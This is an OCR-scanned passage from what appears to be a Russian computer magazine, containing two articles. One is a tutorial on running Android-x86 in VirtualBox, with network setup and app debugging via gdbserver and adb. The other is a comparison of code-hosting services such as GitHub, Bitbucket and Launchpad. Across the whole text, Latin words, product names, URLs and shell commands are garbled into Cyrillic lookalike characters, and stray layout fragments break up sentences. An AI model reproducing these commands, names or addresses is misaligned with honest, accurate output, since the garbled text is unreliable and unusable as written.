В качестве тестовой платформы выбран культовый нетбук Еее 
РС, но фактически не имеет значения, куда ты будешь устанав- 
ливать проект. Это может быть как компьютер, так и планшетник 
или ноутбук (к проверенным устройствам относятся А51І5 Еее, 
Ѵіеѵѵзопіс ѴіеѵѵрасІ 10, йеІІ Іпзрігоп Міпі йио, Затзипд 01 II, Ѵіііѵ 
55, Ьепоѵо ТИіпкРасІ хбі ТаЫеі). Последний билд даже имеет под- 
держку ѴѴі-Рі. 

Впрочем, если установка АпсІгоісІ на ноутбук — это, скорее, 
баловство, то установка на виртуальную машину может принести 
вполне ощутимую пользу, особенно тем, кто хочет попробовать 
свои силы в разработке под АпсІгоісІ, так как после установки им 
будет намного удобнее тестировать приложения (правда, придется 
мириться с некоторыми ограничениями, например с отсутствием 
эмуляции акселерометра). Предлагаю перейти к практике. 

УСТАНОВКА НА ВИРТУАЛКУ 

1. Прежде всего стоит пойти на официальный сайт и выбрать под- 
ходящий образ. Все образы представляютсобой ЫѵеСО. 

2. Выбрав подходящий исошник (я скачал апсі гоісІ-х86-2.2-г2-а5и5_ 
Іаріор.ізо), можно приступать непосредственно к установке под 
виртуальным окружением, например под бесплатным ѴИиаІВох 
( ѵѵѵѵѵѵ.ѵігІиаІЬох.огд ). Запускаем его и создаем новую виртуаль- 
ную маши ну со следующим и параметрами: 
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АпсІгоісІ на х86 




Создаем раздел для установки Апсігоісі-х86 

Имя: АпсІгоісІ 

Операционная система: Ипих 

Версия: Оіііег І_іпих (или Ипих 2.6) 

Память: 512 Мб 

Жесткий диск: 3 Гб 

В настройках виртуальной машины нужно прописать загружен- 
ный нами образ АпсІгоісІ-х86 в качестве ОѴО-привода. После 
этого виртуалку можно запускать. 

3. Когда виртуальная машина загрузится с І_іѵеС0,ты сразу видишь 
менюдля выбора вариантовзагрузки. Чтобы просто запустить 

и посмотреть ОС, достаточно выбрать «Рип АпсІгоісІ-х86 ѵѵііЬоиІ 
іпвіаііаііоп». Поскольку нас больше интересует установка 
АпсІгоісІ в качествеобычной ОС, выбираем последний пункт — 
«Іпзіаііаііоп -> ІпзІаІІ АпсІгоісІ-х86 іо Ьагсісіівк». 

4. После этого появится меню, предлагающее выбрать раздел для 
установки системы. Та к как разделов у нас еще нет, выбираем 
пункт«СгеаІе/МосІісІу рагШіопз», в результате чегозапустится 
обычный сі'сіізк. Создаем новый раздел (первичный), выделяя 
под него все свободное пространство, и ставим разделу флаг 
ВооІаЫе. После этого из системной утилиты можно выйти, не за- 
быв записать изменения. 

5. Теперь можно выбрать созданный раздел для установки в него 
операционной системы. Указываем тип файловой системы — 
ехіЗ, уста на вливаем загрузи и к СПІІ В и делаем директорию/ 
зузіет доступной для чтения/записи. Затем можно либо за- 
грузиться в АпсІгоісІ, или создатьфейковую50-карту, чтотоже 
делается довольно просто. Всё, что для этого от нас требуется, — 
указатьобъем создаваемой карты. 

6 . На этом установка завершена. Выключаем виртуалку, убираем 




Список доступных видеорежимов 

в ее настройках примонтированный исошник АпсІгоісІ -х86 (что- 
бы грузиться уже непосредственно с жесткого диска) и запуска- 
ем заново. Система предложит два варианта загрузки: обычный 
и беЬид. Выбираем первый из них и получаем загруженную под 
виртуалкой АпбгоісІ-систему. Еслиутебя вдругнезаработает 
мышка, зайди в меню «Машина» и выбери пун кт «Выключить 
интеграцию мыши» (тоже самое можно сделать нажатием Рід Ы: 
СігІ + І). 

В общем-то, на данном этапе мы достигли поставленной 
цели — загрузили АпсІгоісІ на обычном компе. Для тех, кто любит 
ставить всё самое последнее, скажу, что версия 4.0 имеет статус 
сіеѵеі, так что в ней могут присутствовать различные недоработ- 
ки. Например, почему-то одновременно показываются графиче- 
ская оболочка и консоль. Не знаю, баг это или фича, но работать 
в такой ОС очень неудобно. Образ 3.2РС2 хорош всем, кроме того, 
что в нем отсутствует поддержка ЕіЬегпеІ, которая была мне 
нужна для отладки приложений. Но если цель всей затеи — про- 
сто поиграться с АпсІгоісІ, то смело можешь выбирать его. Я же 
остановился на ветке 2.2. 



ИНСТАЛЛИМ ПРИЛОЖЕНИЯ 

Итак, система работает — что дальше? Стандартный набор при- 
ложений, поставляемый вместе с ОС, быстро приедается. Да и 
разве мы ради того поднимали АпсІ гоісІ-х86, чтобы оказаться за- 
жатыми в каких-то рамках? К сожалению, АпбгоісІ-х86 не может 
использовать АпсІгоісІ Магкеі — эта опция доступна только для 
тех производителей железа, которые имеют лицензию Ооодіе. 
Поэтому новые приложения установить не так просто, как в 
АпбгоісІ-телефонах. Тем не менее разработчики Ап сі гоісі -х86 по- 



НАСТРОЙКА ЗВУКА И ВИДЕО 



Звук. После установки Апсі гоісі -х86 звук 
очень часто перестает работать. Я тоже 
обнаружил эту проблему, когда зашел на 
ѴоиІиЬе посмотреть ролики. К счастью, всё 
оказалось не так страшно, и замена звуковой 
карты в настройках виртуальной машины 
на «Іп*еІ ИВ Аисііо» позволила устранить 
сбой. Если же простое решение не помогает, 
на официальном сайте выложен РАО, где 
описано, какзаставить работать ІСН АС97 
под ѴігіиаІ Вох ( іиѵ/ѵ4Н7УО ). 



Видео. Операционная система АпсІгоісІ 
ориентирована на широкий круг девайсов, 
от смартфонов до наручных часов. Очевидно, 
что устройства имеют разные размеры и, 
соответственно, разные размеры экрана, 
поэтому было бы здорово протестировать 
разрабатываемое приложение при разных 
разрешениях. Сделать это совсем несложно. 

Во время запуска виртуальной машины надо 
дождаться, пока ОРІІВ предложит варианты 
загрузки ОС, и выбрать в меню пункт «АпсігоісІ- 



х86 2.2 (НОРІ)». Далее нажимаем «е» для 
редактирования записи. Появится еще одно 
меню, в котором следует выбрать запись вида 
«кегпеі /апсігоісІ-2.2/кегпеІ /диіеі гоо* ...... 

Опять нажимаем «е» и в конце строки через 
пробел дописываем «ѵда=азк». Нажимаем Еп- 
*ег для сохранения и «Ь» для загрузки. После 
этого на экран будут выведены все доступные 
видеорежимы, останется только выбрать 
нужный и ввести его номер. Например, режим 
1152x864x32 ѴЕ5А обозначен как 34С. 
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Настраиваем локальную сеть в АпсІгоісІ 

старались максимально упростить процесс установки сторонних 
приложений: 

1. Сначала надо разрешить установку сторонних приложений из 
неизвестных источников. Идем в«5еШпд5 -> Арріісаііопз -> 
ІІпкпоѵѵп зоигсез» и ставим здесь галочку. Если не включить эту 
опцию, то, попытавшисьустановитьприложение, мы получим 
сообщение, что установка заблокирована. 

2. Если известен адрес для скачивания приложения, открываем 
браузер и скачиваем программу. После завершения загрузки 
кликаем на скачанный файл для установки. Появится окошко с 
просьбой подтвердитьустановку приложения. Приудачном рас- 
кладе после нажатия ІпзІаІІ наше приложение начнет уста на вли- 
ваться. Почему приудачном? Потому, что некоторые программы 
могут быть несовместимы с АпсІгоісІ-х86. В таком случае поста - 
витьихне получится. 

Чтобы еще больше упростить поиск приложений, можно вос- 
пользоваться утилитой АпсІАррЗіоге, которая поставляется вместе 
с АпбгоісІ-х86. Это своего рода аналог АпсІгоісІ Магкеі: весь софт 
здесь разбит на категории, а любая программа устанавливается в 
два клика. 

НАСТРОЙКИ ДЛЯ ОТЛАДКИ 

Итак, мы установили ось, поигрались с интерфейсом АпсІгоісІ, 
заинсталлили программы, которые хотели посмотреть, — пора 
переходить к более серьезным занятиям. Я изначально собирал- 
ся использовать такую систему как платформу для тестирова- 
ния разрабатываемых приложений, поэтому расскажу, как это 
делается. 

Первым делом нам понадобится настроить сеть, причем в нашем 
случае она не совсем стандартная. АпбгоісІ-система должна иметь 
доступ в интернет (что просто необходимо при написании сетевых 
приложений), а также еще одно подключение к локальной сети, 
через которое мы могли бы связаться с нашей виртуальной машиной 
для отладки приложений. Еібегпеі нужен, чтобы настроить ІЧАТ в 
виртуальной машине и полноценно пользоваться интернетом. 



ОТЛАДКА ЧЕРЕЗ 6505ЕРѴЕР 

Не могу не отметить, что Апсігоісі-х86 предлагается с 
предустановленным ООВзегѵег'ом, который можно найти в/зЬіп/дсІ- 
Ьзегѵег. Таким образом, у нас есть возможность использовать бйВ 
для отладки приложений на удаленной машине. Для этого, опять 
же, необходимо поднять сеть между виртуальной и хостовой ОС как 
показано выше и запустить ООВзегѵег: 

гоо1:@апсІгоісІ :/ # §сІЬзегѵег <Ѵіг1:иа1Вох ір асІсІге55> : 1234 \ 
[исполняемый файл приложения и полный путь к нему] 

Можно также воспользоваться опцией "--аМасЬ рісГ, чтобы 
присоединиться к процессу, который уже запущен. 

Далее мы можем подключаться к нашей виртуалке с обычной 
машины. Запускаем ОбВ: 

# §сІЬ 

И подключаемся к удаленному серверу: 

§сІЬ > іаг§е1: гетоіе <Ѵіг1:иа1Вох ір асІсІпе55> : 1234 
Работает! 



Итак, открываем раздел «Сеть» и настраиваем там два 
адаптера: 

Адаптер 1 - ІМАТ (в виртуальной машине будет виден как 
еіНѲ. для интернета). 

Адаптер 2 - виртуальный адаптер хоста (в виртуальной 
машине будет виден как еіііі., для отладки приложений). 

Для продолжения требуется ребут системы. По умолчанию 
АпсІгоісІ х86 не может работать с двумя сетевыми адаптерами, 
но это легко исправить. Идем в меню для запуска приложе- 
ний, переходим в «Беиіпдз -> СопПдиге ЕіЬегпеІ» и выбираем 
«еіЬО бЬср», после чего снова перезагружаем виртуалку. После 
загрузки необходимо перейти в консоль. Делается это очень 
просто, с помощью комбинации АН + Р1...Р6 (АН + Р7 вернет нас 
в графический интерфейс). В консоли необходимо выполнить 
следующие команды: 



поо1:@апсІпоісІ :/ # пеіс-р^ 



Іо 


іір 


127.0.0.1 


255.0.0.0 


0x00000049 
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255.255.255.0 


0x00001043 



ЕСЛИ НУЖНЫ ТОЛЬКО ПРИЛОЖЕНИЯ 



Специально на тот случай, если нужно 
запустить только Апсігоісі-приложения 
(скажем, популярные игрушки), создан 
во многом уникальный проект В1ие5*аскз 
( Ыие5Іаск5.сот ). разработка которого ведется 
совместно с компанией АМО. Идея в том, 
чтобы не эмулировать ОС АпсІгоісІ, а полностью 
воссоздать окружение мобильной ОС для 
нативного выполнения программ. Что это дает? 
Ты можешь запускать игры в полноэкранном 



режиме, и они реально не будут тормозить. 
Платформа позволяет запускать десять 
приложений, которые идут в комплекте с 
ней, а также устанавливать дополнительные. 
Это делается очень просто. Заходим в папку 
с установленной программой, находим 
файл Нй-АркНапсіІег.ехе и создаем для него 
ярлык на рабочем столе. Далее скачиваем 
интересующее нас приложение для АпсІгоісІ 
(в виде арк-пакета) и перетаскиваем его на 



только что созданный ярлык. Всё, программа 
установлена — ее можно запускать. Некоторые 
приложения, правда, не установятся из-за 
проблем с совместимостью. Некоторые другие, 
например Апдгу Вігсіз и Ргиіі ІЧіща, помечены 
компанией ВІиеБіаскз как«премиум- 
приложения», которые можно будет установить 
только при использовании грядущей платной 
версии программы. Однако куча других игр 
установится и запустится без проблем. 
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АпсІгоісІ на х86 



е1:Ы ООІлІІЧ Ѳ.Ѳ.Ѳ.Ѳ 0.0. 0.0 0x00001002 

гоо1:@апсІго±сІ : / # пе1:с-Р^ е~Ып1 сісмп 
гор-ЩапсІгоісІ : / # пеіс-Р^ еііііі сіііср 
асіііоп 'сИіср' -Раііесі (іпѵаіісі аг^итепі:) 
гоо1:@апсІгоісІ :/ # пеісТ§ еіііі ир 



гоо1:@апсІгоісІ :/ # пеісТ§ 



ІО 


ІІР 


127.0.0.1 


255.0.0.0 


0X00000049 


еі1і0 


ЦР 


10.0.2.15 


255.255.255.0 


0X00001043 


еіИІ 


ЦР 


192 . 168.56.101 


255 . 255.255.0 


0X00001043 



Теперь, какты видишь, у нас подняты два интерфейса: один для 
выхода в Сеть, другой для отладки приложений. Остается только 
настроить последнюю. 

ОТЛАДКА ПРИЛОЖЕНИЙ 

Для дальнейших действий нам понадобится АпсІгоісІ 5йК который 
придется загрузить ( сіеѵеіорег.апсі гоісІ.сот/зсІк/іпсІех.ЫтІ ). 

1. Скачиваем архив апсІгоісІ-5СІк_г16-\л/іпсІоѵѵ5.2Ір и распако- 

вываем. Заходим в получившуюся папку и ищем директо- 
рию рІаЦогітИооІз. Ага, такой нет. Придется запустить К 
Мападег и установить недостающие инструменты. Выбираем 
категорию «Т о о I -> АпсІгоісІ К РІаПюгітИооІз». После уста- 

новки должна появиться папка рІаПюгітИооІз, которая нас и 
интересует. 

2. В папке надо найти утилиту Ай В. Аббревиатура Ай В расшифро- 
вывается как АпсІгоісІ йеЬид Вгісіде (Отладочный мост«Андро- 
ид»). Так как операционная система отОоодІе принадлежит к 
семейству І_іпих, для ее настройки часто необходимо исполь- 
зовать командную строку. Конечно, существуют программы — 
эмуляторы терминала, которые позволяют выполнять команды 
прямо на устройстве, но, во-первых, на маленьком экране 
телефона этоделать неудобно, а во-вторых, иногда требуется 
доступ к устройству через компьютер. В этих и многих других 
случаях программа Ай В просто незаменима. Она устанавливает 
связь между устройством и компьютером и позволяет прямо на 
компьютере выполнять различные манипуляции с системой 
АпсІгоісІ. 

3. Для того чтобы подключить новое устройство к системе, надо 
ввести: 

асІЬ соппесЕ 192.168.56.101 




Установка приложений с помощью АпсіАррБІоге 




Выбираем на каком эмуляторе будем отлаживать написанное приложение 

соппесііесі іо 192.168.56.101:5555 

После этого можно просмотреть список уже подключенных 
устройств, набрав команду: 

с : \апсІпоісІ-5СІк-ыіпсІоы5\р1а1:-Рогт-1:ооІ5>асІЬ сіеѵісез 
ЦІ5І о-р сіеѵісез а'Ь'ЬасІіесІ 
ети1а1:ог-5554 сіеѵісе 
192.168.56.101:5555 сіеѵісе 

Здесь етиІаІог-5554 — дефолтный эмулятор от Соодіе, а 
192.168.56.101:5555 — наша виртуальная машина. 

4. С этого момента наш эмулятор доступен из Есіірзе, и его можно 
использовать для тестирования приложений, что нам и требова- 
лось. 



ЗАКЛЮЧЕНИЕ 

Что я могу сказать после месяца использования АпбгоісІ-х86? С 
одной стороны, проект еще немного сыроват и некоторые недо- 
работки заметны невооруженным взглядом. Версия 4.0 удивила 
своим интерфейсом, в котором консоль торчала поверх графики. 
Версия 3.2 на первый взгляд не имела глюков в плане графики, но 
не позволяла поднять сеть для отладки приложений. И только 2.2 
удовлетворила всем моим требованиям. 

С отладкой тоже всё непросто: этот способ однозначно быстрее 
эмулятора 5йК, но полноценно отлаживать приложения лучше 
всё-таки на настоящем девайсе. С другой стороны, это шикарная 
возможность запустить АпсІгоісІ на своем компе и понять все его 
достоинства и недостатки, протестировать популярные приложе- 
ния, не покупая телефонов и прочих девайсов. И-И 



5Н0РТСІІГЫ ДЛЯ БЫСТРОЙ 
НАВИГАЦИИ 

• Кнопка ѴѴіпсіоѵѵз соответствует кнопке Ноте в АпсІгоісІ; 

• Е5С соответствует кнопке «Назад» в АпсІгоісІ; 

• Е2 соответствует кнопке Мепи; 

• ЕЗ соответствует кнопке поиска; 

• АН + Р1 — переключение в консольный режим; 

• АК + Р7 — переключение в режим ОШ. 
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РС20ЫЕ 



Бардадым Денис 



Где 

хранитъ код ? 




которого мы сегодня и займемся 



ВЫБИРАЕМ 
ПРАВИЛЬНЫЙ 
ХОСТИНГ КОДА 



Ни один нормальный программист не будет создавать 
папки вроде ѵООІ, ѵ002 и распихивать по ним 
разные версии своих разработок. Вместо этого 
он воспользуется системой управления версий, 
а репозиторий разместит онлайн, чтобы работать 
с кодом могли и другие разработчики. Сделать это 
можно бесплатно благодаря хостингу кода, выбором 



ГТШ 



Если ты не имел 
дело с системой 
управления версий, 
то перед тем, как 
читать статью, 
загляни в архив 
и найди в #12/2011 
номере]! статью 
«біІ&біІНиЬ: с места 
в карьер». 




Где хранить код? 



то такое хостинг кода? Это место, куда 
ты при помощи твоей любимой системы 
контроля версий можешь загрузить свой 
код. Таким образом, с кодом смогут работать 
несколько программистов. При этом хостинг 



поможет с раздачей прав на проекте и позволит 
следить за вносимыми в него изменениями. 
Подобные сервисы предоставляют ряд инстру- 
ментов для разработки и поддержки проекта, 
например ѵѵікі для составления документации 



и іззие Ігаскегдля фиксирования проблем. Более 
того, пользователи одного сервиса, как правило, 
становятся членами активного компьюнити, что 
лучше всего видно на примере БііНиЬ, речь о ко- 
тором пойдет ниже. Но обо всём по порядку. 



ЗоигсеРогде 

ѵтѵѵ.зоигсеГогде.пеІ 

Поддерживаемые системы контроля версий: 

СѴ5, 5ѴІМ, Біі, МегсигіаІ, Вагааг. 

Проекты: 

Только под свободной лицензией. 

Основные возможности: 

ѴѴікі, Ьид Ігаскіпд, собе геѵіеѵѵ, почтовые рас- 
сылки, форум, зЬеІІ-сервер. 

БоигсеРогде является одним из родона- 
чальников сервисов для хостинга проектов 
с открытым исходным кодом. Для каждого 
проекта предоставляется уникальный домен 
имя_проекта.зоигсе! : огде.пеГ который полно- 
стью попадает в распоряжение владельца. 
Одной из ключевых является возможность 
быстро развертывать дополнительные при- 



□сщпе^игдЕ 



ложения. Как тебе идея установить, скажем, 
іззие Ігаскег? Если тебе не нравится исполь- 
зуемый по умолчанию тебіосге, ты можешь 
выбрать Ігас или какой-нибудь еще. То же 
самое относится и к другим приложениям, 
которые также можно развернуть: ѵѵікі, фо- 
рум, блог и т. д. Более того, даже если ни одна 
предустановленная программа не подошла, 
ты всегда можешь установить сторонние при- 
ложения. Для этого предоставляется зГіеІ I - 
сервер, который позволяет загружать рабочие 
файлы по РТР или 5СР. Приложение должно 
быть написано на РНР/РиЬу/РуіЬоп и ис- 
пользовать в качестве базы данных Му5С|1_. 
Подобная расширяемость и навороченность 
затрудняет освоение сервиса: новичку такой 
перегруженный интерфейс может показаться 
излишним. С другой стороны, если тебе чего- 
то не хватает на других хостингах кода, то 
здесь ты можешь реализовать любой необхо- 




БоигсеРогде 



димый функционал. Стоит отметить, что сама 
платформа БоигсеРогде изначально была 
открыта: ее мог развернуть любой желающий. 
Однако с 2000 года исходники закрыли — 
остался лишь форк БаѵаппаЬ. 

Резюме: Для эстетов. 



боодіе Сосіе 

собе.доодІе.сопп/ГіозІіпд 

Поддерживаемые системы контроля версий: 

6ІТ, 5ѴІ\І, МегсигіаІ. 

Проекты: с открытым исходным кодом. 
Основные возможности: 

собе геѵіеѵѵ, ѵѵікі, геіеазе Ьозііпд, іззие Ігаскег. 

Изначально предполагалось, что этот 
хостинг проектов от боодіе станет убийцей 
БоигсеРогде. Сейчас это один из самых про- 
стых в освоении сервисов. По умолчанию 
для каждого проекта доступны ѵѵікі, іззие 
Ігаскег и репозиторий исходного кода. Гибкие 



настройки позволяют менять названия и со- 
держание указанных страниц. К примеру, если 
ты уже хранишь исходники, скажем, на БііНиЬ 
и не хочешь размещать их на боодіе Собе, 
то просто создаешь страницу ѵѵікі с адресом 
репозитория (чтобы пользователи нашли твои 
исходники) и указываешь ее в качестве содер- 
жания страницы Боигсез. Стоиттакже отме- 
тить удобство настройки іззие-трекера и рели- 
зов файлов. Можно задавать свои собственные 
статусы для іззие и метки для выложенных 
файлов. И наверное, самая главная особен- 
ность этого хостинга заключается в том, что он 
задействует другие сервисы Боодіе. Почтовая 
рассылка осуществляется с помощью БтаіІ. 
Боодіе Бгоирз объединены с іззие Ігаскег'ом. 
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боодіе Сосіе 

В качестве учетных записей, естественно, ис- 
пользуются аккаунты Боодіе. 

Резюме: Для фанатов Боодіе и новичков. 



Соч^Іс сосіе 



АззетЫа 



ѵтѵѵ.аззетЫа.сот 

Поддерживаемые системы контроля версий: 

Біі, 5ѴІМ, МегсигіаІ. 

Проекты: 

бесплатные аккаунты для опенсорсных про- 
ектов и платные подписки. 

Основные возможности: 

ѵѵікі, Ііскеіз, собе геѵіеѵѵ, Йр, Ііте Ігаскег, Ьиііб 

зузіет. 

Этот сервис в некотором роде уника- 
лен по своим возможностям. Он имеет как 
обычные для других хостингов фишки, 
так и совершенно уникальные. В их число 



входит поддержка шаблонов отчетов Бсгит 
(популярная сегодня методика управления 
разработкой информационных систем), про- 
двинутая система тикетов, а также инстру- 
менты планирования для гибкой методологии 
разработки (Адііе). Сервис явно рассчитан 
не на социализацию, а на активную работу: 
он хорошо подойдет средним и большим 
командам разработчиков. Здесь есть такие 
инструменты для совместной работы, как 
ѵѵікі, ПІез, теззадез (хорошая замена почто- 
вой рассылке), отчеты о проделанной работе, 
групповой видеочат, а также так называемый 
«поток активности», который очень нагляд- 
но показывает состояние проекта, а также 
выполняемые задачи. Среди огромного коли- 
чества клиентов (а их больше полумиллиона) 



Э55етЫс 




АззетЫа 



есть немало крупных компаний, которым не- 
обходимы средства для управления работой 
над проектом: метрики, статистика кода, Ііте 
Ігаскіпд и т. д. 

Резюме: Для больших команд и компаний. 
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РС20ЫЕ 



ВИЬискеІ: 




ЬіІЬискеІ.огд 

Поддерживаемые системы контроля версий: 

СіІ, МегсигіаІ. 

Проекты: 

неограниченное количество открытых 
и закрытых репозиториев с возможностью 
добавлять до пяти коллабораторов (коллабо- 
раторами обычно называют соразработчиков). 
Платные подписки. 



Многие программисты знакомы с баг- 
трекером ЛПА, который используется во 
многих крупных компаниях. Это разработка 
известной австралийской компании АНаззіап, 
в портфеле продуктов которой, помимо про- 
чего, есть и хостинг кода. ВіТЬискеТ (Корзи- 
на битов) с функциональной точки зрения 
предлагает то же самое, что и бііНиЬ. Однако 



основой этого хостинга является не система 
контроля версий Зіі, а МегсигіаІ, что стало 
одной из ключевых причин его популярности. 
Сейчас используемая система контроля версий 
не так уж и важна: хостинг поддерживает 
и МегсигіаІ, и ЗіС Самая же главная киллер- 
фича, из-за которой многие отдают предпочте- 
ние именно ВііЬискеІ, — это возможность бес- 
платно создавать неограниченное количество 
закрытых репозиториев кода (в каждом может 
быть до пяти участников). У (ЗііНиЬ за подобную 
услугу пришлось бы платить денежки. Ктому 
же проект здесь никак не ограничен в объеме 
дискового пространства. Хостинг может по- 
мочь переехать с других сервисов (ты просто 
указываешь адрес, а остальное он сделает 
сам), а благодаря сходству интерфейса с ин- 
терфейсом ЗіЖиЬ переезд будет безболезнен- 
ным. Но следует заметить, что у сервиса слабо 
развиты инструменты для геѵіеѵѵ кода — нет 
возможности комментировать отрывки кода 




ВіІЬискеІ 



и начинать процесс геѵіеѵѵ кактаковой. Зато 
ВШэискеІ предлагает удобную интеграцию 
с другими сервисами, например хотя бы с тем 
же самым баг-текером ЛРА, а РЕ5Т АРІ по- 
зволяет создать привязку для любого другого 
инструмента (хотя такой АРІ есть и у бііНиЬ). 
Резюме: Для фанатов Зіі и МегсигіаІ. 



бііНиЬ 



діІНиЬ.сот 

Поддерживаемые системы контроля версий: 

біі, 5ѴІМ (діі-зѵп). 

Проекты: 

бесплатные публичные репозитории (300 МБ 
общего дискового пространства), платные 
подписки (закрытые репозитории), команд- 
ные аккаунты. 

Основные возможности: 

собе геѵіеѵѵ, іюгк, ѵѵікі, іззие Ігаскег, почтовые 

рассылки, сохранения заметок. 

Лозунг этого хостинга, непосредственно от- 
ражающий его философию, — социальный ко- 
динг. Здесь все крутится вокруг кода и совмест- 
ной работы разработчиков. После авторизации 
ты увидишь что-то вроде страницы в РасеЬоок 
— только вместо новостей друзей здесь ото- 
бражаются изменения в интересующих тебя 




проектах и активность программистов. Это 
лучшая площадка, чтобы найти энтузиастов, 
которые могли бы принять участие в твоем про- 
екте, или с головой окунуться в идею, которую 
кто-то здесь уже развивает. В погоне за со- 
циализацией разработчики не оставили без 
внимания и самое важное — работу с кодом. 
Чего стоит один только просмотрщик измене- 
ний (сШ ѵіеѵѵег), с помощью которого ты можешь 
комментировать и обсуждать любую строчку 
кода. Чтобы создать форк проекта, требуется 
всего лишь дважды кликнуть мышью. Если ты 
хочешь, чтобы твои изменения попали в основ- 
ной репозиторий, следует отправить специ- 
альный запрос (так называемый риІІ гециезі) 
его владельцу. Основой сервиса является 
распределенная система контроля версий ОіЕ 
Веб-интерфейс с легкостью позволяет делать 
форки, накладывать патчи, предлагать слияния 
(тегде гедиезіз). Тут же можно развернуть 
дискуссию — интерфейс сделан так, что тот, 
кому адресовано сообщение, обязательно 




біІНиЬ 

заметит его. ОіЖиЬ также предлагает один 
из лучших инструментов для геѵіеѵѵ кода. Среди 
возможностей этого инструмента — подсветка 
и определение языка кода, комментирование 
строк кода и коммитов. Некоторые по разным 
причинам недолюбливают СіЖиЬ, но, тем не ме- 
нее, можно сказать наверняка, что это самый 
популярный среди хостингов Сіі-репозиториев. 
И тебе он тоже понравится. 

Резюме: Для фанатов біі и новичков. 



СосіеРІех 



ѵтѵѵ.сосіеріех.сот 

Проекты: 

только под свободной лицензией. 

Поддерживаемые системы контроля версий: 

МегсигіаІ, ТР5 (МісгозоН Теат Роипбаііоп 
Вегѵег). 

Основные возможности: 

ѵѵікі, собе геѵіеѵѵ, почтовая рассылка. 

Если и искать где-то проекты с откры- 
тым исходным кодом на платфторме .ІЧеІ, то 
на Соберіех. В этом нет ничего удивительного — 
ведь это проект компании МісгозоЙ. И хотя ни- 
кто не накладывает ограничения на инструмен- 
ты, используемые для разработки, этот хостинг 



считается настоящей Меккой для проектов на . 
ІЧеЕ Что говорить, если прямо из ѴізиаІ Біибіо 
можно работать с тасками, багами и версиями 
проектов, которые хостятся на СобеРІех. Сервис 
полностью бесплатный. Каждому проекту вы- 
деляется домен имя_проекта. соберіех. сот. Из- 
начально скрытая страница проекта не раскры- 
вается в течение месяца, чтобы у разработчика 
была возможность заполнить документацию, 
выложить текущие исходники и определиться 
с лицензией. После публикации проект начина- 
ет настоящую жизнь — с этого момента можно 
подключать разработчиков и редакторов, 
начинать обсуждения и т. д. В целом СобеРІех 
оставляет ощущения продуманного проекта 
и по функционалу сильно напоминает СіЖиЬ. 
Тем не менее, этот сервис больше подойдет 
программистам-одиночкам или небольшим 




СосіеРІех 

командам разработчиков, так как интерфейс 
заточен под ѵѵікі, а не под исходный код. Дру- 
гими словами, платформа, скорее, ориентиро- 
вана на публикацию (ведение документации), 
а не на разработку. 

Резюме: Для разработчиков .ІЧеЕ 
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Где хранить код? 
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дііогіоиз.огд 

Поддерживаемые системы контроля версий: 

ЗіС 

Проекты: 

публичные репозитории. 

Основные возможности: 

ѵѵікі, собе геѵіеѵѵ, почтовая рассылка. 



Как несложно понять из названия, это хо- 
стингдля Зіі-репозиториев кода. Он появился 
раньше, чем ЗііНиЬ, но развивался довольно 
вяло. Это особенно странно с учетом того, что 
исходники Зііогіоиз с самого начала были 
открыты. Таким образом, ты без проблем смо- 
жешь развернуть подобный сервис на своих 



серверах и использовать свой собственный 
хостинг кода для работы с файлами разных 
проектов (например, внутри предприятия). 
Правда, спешу предупредить, что в плане 
удобства проект, на мой взгляд, оставляет же- 
лать лучшего. Он скорее подходит индивиду- 
альным разработчикам, чем команде кодеров. 
К примеру, здесь напрочь отсутствуют хоть 
какие-нибудь инструменты для геѵіеѵѵ кода. 

От встроенного ѵѵікі нет никакого толку — он 
абсолютно не годится для ведения проект- 
ной документации. Перемещаться по дереву 
исходников и просматривать ЫоЬ'ы (исполь- 
зуемые в Зіі структуры данных) неудобно. 

С другой стороны, местами интерфейс даже 
понятнее, чем у ЗііНиЬ: например, очень на- 
глядно отображается части проекта и права 
доступа. Если ЗіШиЬ — это настоящая кладезь 




бііогіоиз 



интересных проектов, то на Зііогіоиз не так 
много известных разработок. Если бы не ре- 
позитории библиотек 01, то проект, возможно, 
зачах бы совсем. 

Резюме: Для фанатов ЗіГ 



Кііп 



ѵтѵѵ.Годсгеек.сот/кіІп 

Поддерживаемые системы контроля версий: 

МегсигіаІ. 

Проекты: только платные подписки (возмо- 
жен бесплатный доступ на 45 дней). 

Основные возможности: 

собе геѵіеѵѵ, Ьид Ігаскег. 

Этот сервис можно назвать одним из лучших 
хостингов МегсигіаІ-репозиториев, у которого, 
пожалуй, есть только один минус — он плат- 
ный. Использовать его — одно удовольствие. 
Для миграции с других хостингов предлагается 



специальная утилита импорта, по умолчанию 
настроенная на твой аккаунт, что позволяет 
очень быстро сделать импорт из ЗІІ-, 5ѴІМ-, 
МегсигіаІ-репозиториев. Для работы под 
виндой предоставляется расширенная версия 
клиента ТогІоізеНд, специально заточенного 
под этот сервис. Кііп имеет грамотный интер- 
фейс для геѵіеѵѵ-кода, да и вообще весь III вы- 
полнен на самом высоком уровне. В качестве 
Ьид Ігаскег'а предлагается отдельный продукт, 
известный в кругах программистов, — РодВидг 
(правда, только при расширенной подписке). 

В целом этот сервис хорошо подходит для но- 
вичков, которым придется по душе продуман- 
ный и не перегруженный лишними наворотами 
интерфейс. Короче говоря, с Кііп можно сразу 
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Кііп 

заняться написанием кода, а не возиться с на- 
стройкой среды разработки. Но для этого, увы, 
придется заплатить денежку. 

Резюме: Для фанатов МегсигіаІ и новичков. 



»Ь.КІІП 



І.аипсГіра<] 

ІаипсНрасІ.пеІ 

Поддерживаемые системы контроля версий: 

Вагааг. 

Проекты: 

опенсорсные проекты. 

Основные возможности: 

собе геѵіеѵѵ, Ьид Ігаскег, {ад, апзѵѵегз. 

Этот хостинг кода примечателен прежде 
всего тем, что построен на системе контроля 
версий Вагааг, разработанной компанией 
СапопісаІ. Собственно, самим ЬаипсЬраб за- 
нимаются те же самые разработчики. Если ты 



пытаешься вспомнить, где слышал название 
этой компании, подскажу: это те же парни, 
которые породили на свет бешено популярный 
ІІЬипІи І_іпих. Нет ничего удивительного в том, 
что ЬаипсЬраб ориентирован на эту ОС. Напри- 
мер, он поддерживает ІІЬипІи РРА (РегзопаІ 
Раскаде АгсЬіѵез), что позволяет легко 
снабжать пользователей Убунты программами 
и обновлениями. Для большинства проектов, 
которые хостятся на ЬаисЬраб, необходим го- 
товый репозиторий для Ьіпих-пользователей. 
Не могу не отметить несколько фишек, кото- 
рые крайне удобны в работе. К примеру, для 
каждого проекта можно сделать раздел «Во- 
просы и ответы», а продвинутый инструмент 
для собе геѵіеѵѵ сам проверит все конфликты 



. | ►ии'г Ѵ Ьі іі ч Си Ь ■< Ітйід 




ЬаипсИрас! 



и оповестит всех участников, открыв на сайте 
дискуссию. 

